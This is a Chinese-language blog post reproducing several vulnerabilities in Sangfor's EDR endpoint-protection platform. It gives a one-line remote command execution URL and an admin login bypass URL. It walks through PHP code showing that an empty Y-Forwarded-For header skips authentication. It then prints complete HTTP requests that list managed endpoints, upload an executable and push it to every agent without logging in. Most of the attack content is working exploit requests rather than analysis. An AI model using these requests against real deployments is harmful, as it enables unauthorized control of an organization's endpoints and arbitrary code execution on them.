深信服DER RCE 复现

作者: print("") 分类: 漏洞复现 发布时间: 2021-02-25 23:11

https://url:9443/tool/log/c.php?strip_slashes=system&host=id

任意用户登陆

https://xxxxx:5000/ui/login.php?user=admin

深信服EDR终端检测响应平台-全接口未授权

代码:/ldb/bin/mapreduce/util/common/auth.php

$app_auth_check = function ()…  匿名函数检测auth权限有一处逻辑

$is_super_ip = call_user_func($super_ip_check);
if($is_super_ip){
 return true; }

跟进$super_ip_check

$super_ip_check = function() use(&$get_super_ip, &$super_user_check){
 $super_ip = call_user_func($get_super_ip);
 $user_addr = $_SERVER["HTTP_Y_FORWARDED_FOR"];
 if($user_addr == $super_ip){
 return true;
 }
 else{
 return call_user_func($super_user_check);
 } };

其代码逻辑就是只要你的请求头HTTP_Y_FORWARDED_FOR  的值与super_ip的值一样即可。super_ip 的值需要继续跟$get_super_ip 函数

$get_super_ip = function(){
 $super_ip_config = ldb_ext_root()."../../dc/config/cssp_super_ip.ini";
 $super_ip = "";
 if(file_exists($super_ip_config)){
 $super_config_data = parse_ini_file($super_ip_config, true);
 $super_ip = isset($super_config_data["config"]["super_ip"]) ? $super_config_data[
"config"]["super_ip"] : "";
 }
 
 return $super_ip; };

获取$super_ip_config 但默认是不存在的。$super_ip 也就是为空。那么我们只需要把HTTP_Y_FORWARDED_FOR   的值为空就行了

这里举个例子 通过lanuch.php 调用接口置空的HTTP_Y_FORWARDED_FOR   即可未授权调用

获取终端列表:

POST /launch.php?s=1597774984791 HTTP/1.1
Host: xxxx:443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox
/79.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 375
Origin: https://xxxx
Connection: close
Referer: https://xxxx/ui/index.php
Y-Forwarded-For:


{"app_args":{"name":"app.web.host_mgr.host_mgr_new","option":{}},"filter":{"info":"","zon
e":[{"zone_id":"root","zone_name":"๚ړᕟ"}],"file_type":"","authorized":"","status":"","f
ilter_uninstalled":true,"exclude_agent_upgrade_state":-1,"exclude_virus_upgrade_state":-1 ,"mss_zone_id":"","filter_mss_zone":false,"os_type":"","recursion":1},"opr":"list_agents"
,"query_id":""}

我们可以直接走三个接口:

1.获取终端列表

2.上传脚本

3.下发脚本

这样我们可以控制无需登陆即可控制所有的agent 

上传脚本:

POST /divideUploader.php HTTP/1.1
Host: xxx:443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox
/79.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------204027972398437686
31493004995
Content-Length: 945
Origin: https://xxx
Connection: close
Referer: https://xxx/ui/index.php
Y-Forwarded-For:

-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="file"; filename="123.exe"
Content-Type: application/octet-stream
whoami
-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="filename"
1.exe
-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="file_name"
1.exe
-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="blob_num"
1
-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="total_blobnum"
1
-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="file_size"
6
-----------------------------20402797239843768631493004995
Content-Disposition: form-data; name="opr"
divide_uploader
-----------------------------20402797239843768631493004995--

下发脚本 (agents 为节点ID name 为上传文件名 path为路径)

POST /launch.php HTTP/1.1
Host: xxx:443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox
/79.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 570
Origin: https://xxx
Connection: close
Referer: https://xxx/ui/index.php
Y-Forwarded-For:


{"app_args":{"name":"app.web.batch_push.batch_cmd"},"type":"add","opr":"add_batch","symbo
l_name":"localhost.localdomain","agents":[3235219995,2025893441,1874996931,1186936479,283
5715778,33528800,4123982607,954247757,3591871664,2317094365,3169605272,2960150020,3329615
483,3041751269,1001882091,3731686209,3553442458,3165658782,2345758958,2466487371,31326157
72,1661988485,3093836842,4109291945,3408188836,4189090218,3491862422,1294508716,218779668
7],"file":{"name":"123.exe","path":"/tmp/1597779688.exe","note":""},"query_id":""}

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注